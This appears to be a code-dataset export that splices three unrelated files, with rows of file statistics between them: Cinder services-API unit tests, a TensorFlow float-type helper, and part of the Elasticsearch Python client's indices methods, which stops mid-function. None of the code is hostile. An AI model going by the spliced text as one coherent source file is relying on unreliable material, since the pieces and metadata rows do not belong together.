'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test2'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38),
'disabled_reason': 'test4'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test5'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host2',
'zone': 'cinder',
'status': 'enabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38),
'disabled_reason': ''}]}
self.assertEqual(response, res_dict)
def test_services_list_with_binary(self):
req = FakeRequestWithBinary()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)},
{'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'enabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38)}]}
self.assertEqual(response, res_dict)
def test_services_detail_with_binary(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequestWithBinary()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'frozen': False,
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test2'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'frozen': False,
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38),
'disabled_reason': 'test4'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'frozen': False,
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test5'},
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'host': 'host2',
'zone': 'cinder',
'status': 'enabled',
'state': 'down',
'frozen': False,
'updated_at': datetime.datetime(2012, 9, 18,
8, 3, 38),
'disabled_reason': ''}]}
self.assertEqual(response, res_dict)
def test_services_list_with_host_service(self):
req = FakeRequestWithHostService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)}]}
self.assertEqual(response, res_dict)
def test_services_detail_with_host_service(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequestWithHostService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test2',
'frozen': False}]}
self.assertEqual(response, res_dict)
def test_services_list_with_host_binary(self):
req = FakeRequestWithHostBinary()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5)}]}
self.assertEqual(response, res_dict)
def test_services_detail_with_host_binary(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = FakeRequestWithHostBinary()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'cinder-volume',
'replication_status': None,
'active_backend_id': None,
'frozen': False,
'host': 'host1',
'zone': 'cinder',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29,
13, 42, 5),
'disabled_reason': 'test2'}]}
self.assertEqual(response, res_dict)
def test_services_enable_with_service_key(self):
body = {'host': 'host1', 'service': 'cinder-volume'}
req = fakes.HTTPRequest.blank(
'/v2/%s/os-services/enable' % fake.PROJECT_ID)
res_dict = self.controller.update(req, "enable", body)
self.assertEqual('enabled', res_dict['status'])
def test_services_enable_with_binary_key(self):
body = {'host': 'host1', 'binary': 'cinder-volume'}
req = fakes.HTTPRequest.blank(
'/v2/%s/os-services/enable' % fake.PROJECT_ID)
res_dict = self.controller.update(req, "enable", body)
self.assertEqual('enabled', res_dict['status'])
def test_services_disable_with_service_key(self):
req = fakes.HTTPRequest.blank(
'/v2/%s/os-services/disable' % fake.PROJECT_ID)
body = {'host': 'host1', 'service': 'cinder-volume'}
res_dict = self.controller.update(req, "disable", body)
self.assertEqual('disabled', res_dict['status'])
def test_services_disable_with_binary_key(self):
req = fakes.HTTPRequest.blank(
'/v2/%s/os-services/disable' % fake.PROJECT_ID)
body = {'host': 'host1', 'binary': 'cinder-volume'}
res_dict = self.controller.update(req, "disable", body)
self.assertEqual('disabled', res_dict['status'])
def test_services_disable_log_reason(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = (
fakes.HTTPRequest.blank('v1/fake/os-services/disable-log-reason'))
body = {'host': 'host1',
'binary': 'cinder-scheduler',
'disabled_reason': 'test-reason',
}
res_dict = self.controller.update(req, "disable-log-reason", body)
self.assertEqual('disabled', res_dict['status'])
self.assertEqual('test-reason', res_dict['disabled_reason'])
def test_services_disable_log_reason_none(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = (
fakes.HTTPRequest.blank('v1/fake/os-services/disable-log-reason'))
body = {'host': 'host1',
'binary': 'cinder-scheduler',
'disabled_reason': None,
}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update,
req, "disable-log-reason", body)
def test_invalid_reason_field(self):
# Check that empty strings are not allowed
reason = ' ' * 10
self.assertFalse(self.controller._is_valid_as_reason(reason))
reason = 'a' * 256
self.assertFalse(self.controller._is_valid_as_reason(reason))
# Check that spaces at the end are also counted
reason = 'a' * 255 + ' '
self.assertFalse(self.controller._is_valid_as_reason(reason))
reason = 'it\'s a valid reason.'
self.assertTrue(self.controller._is_valid_as_reason(reason))
reason = None
self.assertFalse(self.controller._is_valid_as_reason(reason))
| 40.636228
| 78
| 0.483036
| 2,480
| 27,145
| 5.13871
| 0.095161
| 0.065286
| 0.081607
| 0.088041
| 0.830665
| 0.812932
| 0.790333
| 0.773227
| 0.754708
| 0.724969
| 0
| 0.044706
| 0.382796
| 27,145
| 667
| 79
| 40.697151
| 0.715948
| 0.034481
| 0
| 0.793403
| 0
| 0
| 0.212846
| 0.006797
| 0
| 0
| 0
| 0
| 0.041667
| 1
| 0.045139
| false
| 0.001736
| 0.022569
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c4ef3070547cafe19eb61b5f247e543a3c9e764
| 1,603
|
py
|
Python
|
built-in/TensorFlow/Official/nlp/Transformer_for_TensorFlow/noahnmt/utils/constant_utils.py
|
Ascend/modelzoo
|
f018cfed33dbb1cc2110b9ea2e233333f71cc509
|
[
"Apache-2.0"
] | 12
|
2020-12-13T08:34:24.000Z
|
2022-03-20T15:17:17.000Z
|
built-in/TensorFlow/Official/nlp/Transformer_for_TensorFlow/noahnmt/utils/constant_utils.py
|
Ascend/modelzoo
|
f018cfed33dbb1cc2110b9ea2e233333f71cc509
|
[
"Apache-2.0"
] | 1
|
2022-01-20T03:11:05.000Z
|
2022-01-20T06:53:39.000Z
|
built-in/TensorFlow/Official/nlp/Transformer_for_TensorFlow/noahnmt/utils/constant_utils.py
|
Ascend/modelzoo
|
f018cfed33dbb1cc2110b9ea2e233333f71cc509
|
[
"Apache-2.0"
] | 2
|
2021-07-10T12:40:46.000Z
|
2021-12-17T07:55:15.000Z
|
# coding=utf-8
# Copyright Huawei Noah's Ark Lab.
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import numpy as np
flags = tf.flags
FLAGS = flags.FLAGS
INF = 10000.0
def DT_FLOAT():
return tf.float16 if FLAGS.use_fp16 else tf.float32
def NP_FLOAT():
return np.float16 if FLAGS.use_fp16 else np.float32
def DT_INT():
return tf.int32
| 32.714286
| 78
| 0.720524
| 244
| 1,603
| 4.713115
| 0.393443
| 0.104348
| 0.045217
| 0.055652
| 0.766957
| 0.766957
| 0.723478
| 0.723478
| 0.723478
| 0.723478
| 0
| 0.027653
| 0.165315
| 1,603
| 48
| 79
| 33.395833
| 0.831839
| 0.792265
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0
| 0.181818
| 0.272727
| 0.727273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
9c5fdd8222f30b36a47ec94849e5a963187ba1ac
| 140,416
|
py
|
Python
|
elasticsearch/_sync/client/indices.py
|
kholia/elasticsearch-py
|
013433e5008277144065ad8e82f66870b203269a
|
[
"Apache-2.0"
] | 1
|
2022-01-05T03:43:43.000Z
|
2022-01-05T03:43:43.000Z
|
elasticsearch/_sync/client/indices.py
|
kholia/elasticsearch-py
|
013433e5008277144065ad8e82f66870b203269a
|
[
"Apache-2.0"
] | null | null | null |
elasticsearch/_sync/client/indices.py
|
kholia/elasticsearch-py
|
013433e5008277144065ad8e82f66870b203269a
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Any, Dict, List, Optional, Union
from elastic_transport import HeadApiResponse, ObjectApiResponse
from ._base import NamespacedClient
from .utils import SKIP_IN_PATH, _quote, _quote_query, _rewrite_parameters
class IndicesClient(NamespacedClient):
@_rewrite_parameters()
def add_block(
self,
*,
index: Any,
block: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Adds a block to an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/index-modules-blocks.html>`_
:param index: A comma separated list of indices to add a block to
:param block: The block to add (one of read, write, read_only or metadata)
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if block in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'block'")
__path = f"/{_quote(index)}/_block/{_quote(block)}"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("PUT", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def analyze(
self,
*,
index: Optional[Any] = None,
analyzer: Optional[str] = None,
attributes: Optional[List[str]] = None,
char_filter: Optional[List[Any]] = None,
error_trace: Optional[bool] = None,
explain: Optional[bool] = None,
field: Optional[Any] = None,
filter: Optional[List[Any]] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
normalizer: Optional[str] = None,
pretty: Optional[bool] = None,
text: Optional[Any] = None,
tokenizer: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Performs the analysis process on a text and return the tokens breakdown of the
text.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-analyze.html>`_
:param index: The name of the index to scope the operation
:param analyzer:
:param attributes:
:param char_filter:
:param explain:
:param field:
:param filter:
:param normalizer:
:param text:
:param tokenizer:
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_analyze"
else:
__path = "/_analyze"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if analyzer is not None:
__body["analyzer"] = analyzer
if attributes is not None:
__body["attributes"] = attributes
if char_filter is not None:
__body["char_filter"] = char_filter
if error_trace is not None:
__query["error_trace"] = error_trace
if explain is not None:
__body["explain"] = explain
if field is not None:
__body["field"] = field
if filter is not None:
__body["filter"] = filter
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if normalizer is not None:
__body["normalizer"] = normalizer
if pretty is not None:
__query["pretty"] = pretty
if text is not None:
__body["text"] = text
if tokenizer is not None:
__body["tokenizer"] = tokenizer
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def clear_cache(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
fielddata: Optional[bool] = None,
fields: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
query: Optional[bool] = None,
request: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Clears all or specific caches for one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-clearcache.html>`_
:param index: A comma-separated list of index name to limit the operation
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param fielddata: Clear field data
:param fields: A comma-separated list of fields to clear when using the `fielddata`
parameter (default: all)
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param query: Clear query caches
:param request: Clear request cache
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_cache/clear"
else:
__path = "/_cache/clear"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if fielddata is not None:
__query["fielddata"] = fielddata
if fields is not None:
__query["fields"] = fields
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if query is not None:
__query["query"] = query
if request is not None:
__query["request"] = request
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def clone(
self,
*,
index: Any,
target: Any,
aliases: Optional[Dict[Any, Any]] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
settings: Optional[Dict[str, Any]] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Clones an index
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-clone-index.html>`_
:param index: The name of the source index to clone
:param target: The name of the target index to clone into
:param aliases:
:param master_timeout: Specify timeout for connection to master
:param settings:
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Set the number of active shards to wait for on
the cloned index before the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if target in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'target'")
__path = f"/{_quote(index)}/_clone/{_quote(target)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def close(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Closes an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-open-close.html>`_
:param index: A comma separated list of indices to close
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Sets the number of active shards to wait for before
the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_close"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def create(
self,
*,
index: Any,
aliases: Optional[Dict[Any, Any]] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
mappings: Optional[Any] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
settings: Optional[Any] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Creates an index with optional settings and mappings.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-create-index.html>`_
:param index: The name of the index
:param aliases:
:param mappings: Mapping for fields in the index. If specified, this mapping
can include: - Field names - Field data types - Mapping parameters
:param master_timeout: Specify timeout for connection to master
:param settings:
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Set the number of active shards to wait for before
the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if mappings is not None:
__body["mappings"] = mappings
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def create_data_stream(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Creates a data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: The name of the data stream
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_data_stream/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("PUT", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def data_streams_stats(
self,
*,
name: Optional[Any] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Provides statistics on operations happening in a data stream.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: A comma-separated list of data stream names; use `_all` or empty
string to perform the operation on all data streams
:param expand_wildcards:
"""
if name not in SKIP_IN_PATH:
__path = f"/_data_stream/{_quote(name)}/_stats"
else:
__path = "/_data_stream/_stats"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def delete(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Deletes an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-delete-index.html>`_
:param index: A comma-separated list of indices to delete; use `_all` or `*`
string to delete all indices
:param allow_no_indices: Ignore if a wildcard expression resolves to no concrete
indices (default: false)
:param expand_wildcards: Whether wildcard expressions should get expanded to
open, closed, or hidden indices
:param ignore_unavailable: Ignore unavailable indexes (default: false)
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("DELETE", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def delete_alias(
self,
*,
index: Any,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Deletes an alias.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html>`_
:param index: A comma-separated list of index names (supports wildcards); use
`_all` for all indices
:param name: A comma-separated list of aliases to delete (supports wildcards);
use `_all` to delete all aliases for the specified indices.
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit timestamp for the document
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/{_quote(index)}/_alias/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("DELETE", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def delete_data_stream(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Deletes a data stream.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: A comma-separated list of data streams to delete; use `*` to delete
all data streams
:param expand_wildcards: Whether wildcard expressions should get expanded to
open or closed indices (default: open)
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_data_stream/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("DELETE", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def delete_index_template(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
